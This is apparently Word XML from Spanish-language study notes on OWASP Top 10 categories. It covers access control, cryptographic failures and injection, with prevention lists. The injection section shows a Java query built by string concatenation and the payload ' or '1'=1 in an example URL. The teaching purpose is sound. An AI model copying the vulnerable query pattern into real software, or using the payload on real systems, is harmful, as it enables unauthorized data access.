    <w:p w14:paraId="7B33416A" w14:textId="77777777" w:rsidR="00125191" w:rsidRPr="00125191" w:rsidRDefault="009E0158" w:rsidP="00125191">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00125191">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="004C0118" w:rsidRPr="00125191">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">i la funcionalidad forma parte del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004C0118" w:rsidRPr="00125191">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Workflow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00125191">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="004C0118" w:rsidRPr="00125191">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> esta debe ser verificada y asegurada las condiciones para el acceso</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4947D3F5" w14:textId="6F6EA40C" w:rsidR="00712564" w:rsidRPr="00125191" w:rsidRDefault="00125191" w:rsidP="00125191">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="004C0118" w:rsidRPr="00125191">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>o implementar controles en la capa de visualización</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639B445B" w14:textId="77777777" w:rsidR="00A50CE9" w:rsidRDefault="00A50CE9" w:rsidP="004C318E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="569A358B" w14:textId="2211B3EB" w:rsidR="00A50CE9" w:rsidRPr="00125191" w:rsidRDefault="00A50CE9" w:rsidP="00125191">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00125191">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">A02- Fallas </w:t>
      </w:r>
      <w:r w:rsidR="009E0158" w:rsidRPr="00125191">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Criptográficas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7504F135" w14:textId="77777777" w:rsidR="00A50CE9" w:rsidRDefault="00A50CE9" w:rsidP="00125191">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>La información sensible demanda protección adicional encriptándola en su almacenamiento y tránsito.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A664AE" w14:textId="11E19F2B" w:rsidR="00A50CE9" w:rsidRPr="00AE18AA" w:rsidRDefault="0061675C" w:rsidP="00125191">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Ejemplo</w:t>
      </w:r>
      <w:r w:rsidR="00A50CE9" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00A50CE9" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Se encriptan los números de tarjetas de crédito utilizando el cifrado automático de la BD. Esto significa que esta información se descifra automáticamente, permitiendo que una falla en la inyección SQL permite que se obtenga esta información</w:t>
      </w:r>
      <w:r w:rsidR="009E0158" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A50CE9" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Se debería haber encriptado en nivel superior, por </w:t>
      </w:r>
      <w:r w:rsidR="00B32D7D" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ejemplo,</w:t>
      </w:r>
      <w:r w:rsidR="00A50CE9" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> cifrando los valores con una </w:t>
      </w:r>
      <w:r w:rsidR="00A50CE9" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>llave publica</w:t>
      </w:r>
      <w:r w:rsidR="00A50CE9" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y permitiendo solo descifrar con la </w:t>
      </w:r>
      <w:r w:rsidR="00A50CE9" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>llave privada</w:t>
      </w:r>
      <w:r w:rsidR="00A50CE9" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F714CBD" w14:textId="0472AAC6" w:rsidR="004C0118" w:rsidRPr="00AE18AA" w:rsidRDefault="00E710E3" w:rsidP="00E710E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Ejemplo 2</w:t>
      </w:r>
      <w:r w:rsidR="00A50CE9" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00A50CE9" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Un sitio web no utiliza o fuerza el uso de TLS para todas las paginas o utiliza cifrados débiles. Un atacante que monitorea el </w:t>
      </w:r>
      <w:r w:rsidR="009E0158" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>tráfico</w:t>
      </w:r>
      <w:r w:rsidR="00A50CE9" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A50CE9" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>degrada de HTTPS a HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00A50CE9" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> e intercepta los pedidos, roba las cookies de la sesión. Utiliza esta información obtenida, accediendo a información o cambiándola. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAFEED3" w14:textId="77777777" w:rsidR="00E710E3" w:rsidRDefault="00E710E3" w:rsidP="00E710E3">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Ejemplo 3</w:t>
      </w:r>
      <w:r w:rsidR="00A50CE9" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00A50CE9" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> La BD de contraseña </w:t>
      </w:r>
      <w:r w:rsidR="00A50CE9" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>utiliza “unsalted hashes”</w:t>
      </w:r>
      <w:r w:rsidR="00F13BEB" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F13BEB" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Una debilidad en el upload de archivos permitiría al atacante obtener el archivo de contraseñas.</w:t>
      </w:r>
      <w:r w:rsidR="00F13BEB" w:rsidRPr="00E710E3">
        <w:rPr>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E2CEBC" w14:textId="77777777" w:rsidR="00E710E3" w:rsidRDefault="00F13BEB" w:rsidP="00E710E3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E710E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Prevención</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12600C2A" w14:textId="77777777" w:rsidR="00E710E3" w:rsidRPr="00E710E3" w:rsidRDefault="00E710E3" w:rsidP="00E710E3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00F13BEB" w:rsidRPr="00E710E3">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ifrar los datos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0426388E" w14:textId="77777777" w:rsidR="00E710E3" w:rsidRPr="00E710E3" w:rsidRDefault="00E710E3" w:rsidP="00E710E3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="00F13BEB" w:rsidRPr="00E710E3">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>o almacenar datos sensibles innecesarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671231F3" w14:textId="77777777" w:rsidR="00E710E3" w:rsidRPr="00E710E3" w:rsidRDefault="00E710E3" w:rsidP="00E710E3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00F13BEB" w:rsidRPr="00E710E3">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>lgoritmos de cifrado fuertes, claves robustas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D2F21F" w14:textId="77777777" w:rsidR="00E710E3" w:rsidRPr="00E710E3" w:rsidRDefault="00E710E3" w:rsidP="00E710E3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00F13BEB" w:rsidRPr="00E710E3">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>lmacenar claves con algoritmos diseñados para eso</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>bcrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, script, PBKDF2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1899CD39" w14:textId="6D641004" w:rsidR="00F13BEB" w:rsidRPr="00E710E3" w:rsidRDefault="00E710E3" w:rsidP="00E710E3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00F13BEB" w:rsidRPr="00E710E3">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">eshabilitar el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F13BEB" w:rsidRPr="00E710E3">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>auto-completar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F13BEB" w:rsidRPr="00E710E3">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en los formularios y cache de página con datos sensibles. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F62C006" w14:textId="77777777" w:rsidR="00F13BEB" w:rsidRDefault="00F13BEB" w:rsidP="00F13BEB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A6D887C" w14:textId="4C2427A5" w:rsidR="00F13BEB" w:rsidRPr="00E710E3" w:rsidRDefault="00F13BEB" w:rsidP="00E710E3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E710E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>A03- Inyección</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37707DC7" w14:textId="71961308" w:rsidR="00E710E3" w:rsidRDefault="00F13BEB" w:rsidP="00E710E3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Las fallas de inyecciones tales como SQL, NoSQL, OS, etc. Suceden cuando los datos no confiables son enviados. </w:t>
      </w:r>
      <w:r w:rsidR="0096040C">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Los datos hostiles del atacante pueden engañar al interprete y realizar tareas no deseadas.</w:t>
      </w:r>
      <w:r w:rsidR="007F34D8">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ocurren en el área del servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EFA9C8" w14:textId="739B34A4" w:rsidR="00E710E3" w:rsidRPr="00AE18AA" w:rsidRDefault="00AE18AA" w:rsidP="00E710E3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="0096040C" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>jemplo:</w:t>
      </w:r>
      <w:r w:rsidR="0096040C" w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469182E8" w14:textId="40223D97" w:rsidR="00E710E3" w:rsidRDefault="00E710E3" w:rsidP="00E710E3">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00E710E3">
        <w:t xml:space="preserve">String query = “SELECT * </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                            </w:t>
      </w:r>
      <w:r w:rsidRPr="00E710E3">
        <w:t>FROM a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ccounts </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                            WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>custID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = “” + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>request.getParameter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(“id”) + “””;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAFF9BB" w14:textId="0EF3E1B1" w:rsidR="00E710E3" w:rsidRPr="00AE18AA" w:rsidRDefault="00E710E3" w:rsidP="00E710E3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve">El atacante modifica en su navegador el parámetro ‘id’ para enviar: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>“ ‘</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE18AA">
        <w:rPr>
          <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve"> ‘1’=1 ” devolviendo así todos los registros de la tabla ACCOUNTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7F58E1" w14:textId="1CF745AE" w:rsidR="00E710E3" w:rsidRDefault="00000000" w:rsidP="00E710E3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidR="00E710E3" w:rsidRPr="00B3158C">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:val="es-MX"/>
          </w:rPr>
          <w:t>http://example.com/app/accountView?id=’or’1’=1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="28E34C50" w14:textId="77777777" w:rsidR="00302CCB" w:rsidRPr="00302CCB" w:rsidRDefault="0096040C" w:rsidP="00302CCB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302CCB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Prevención</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE61C37" w14:textId="77777777" w:rsidR="00302CCB" w:rsidRPr="00302CCB" w:rsidRDefault="0096040C" w:rsidP="00302CCB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302CCB">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Uso de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00302CCB">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>APIs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00302CCB">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> con manejo parametrizado de intérpretes o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00302CCB">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ORMs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="06A95434" w14:textId="77777777" w:rsidR="00302CCB" w:rsidRPr="00302CCB" w:rsidRDefault="00302CCB" w:rsidP="00302CCB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="0096040C" w:rsidRPr="00302CCB">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>odificación de caracteres especiales</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C66253F" w14:textId="4BA49EF9" w:rsidR="00302CCB" w:rsidRPr="00302CCB" w:rsidRDefault="00302CCB" w:rsidP="00302CCB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="0096040C" w:rsidRPr="00302CCB">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>istas blancas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> o validación de entradas positivas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33182B61" w14:textId="77777777" w:rsidR="00302CCB" w:rsidRPr="00302CCB" w:rsidRDefault="00302CCB" w:rsidP="00302CCB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidR="0096040C" w:rsidRPr="00302CCB">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>tilización de LIMIT y otros controles SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE97C66" w14:textId="77777777" w:rsidR="00302CCB" w:rsidRDefault="00302CCB" w:rsidP="00302CCB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
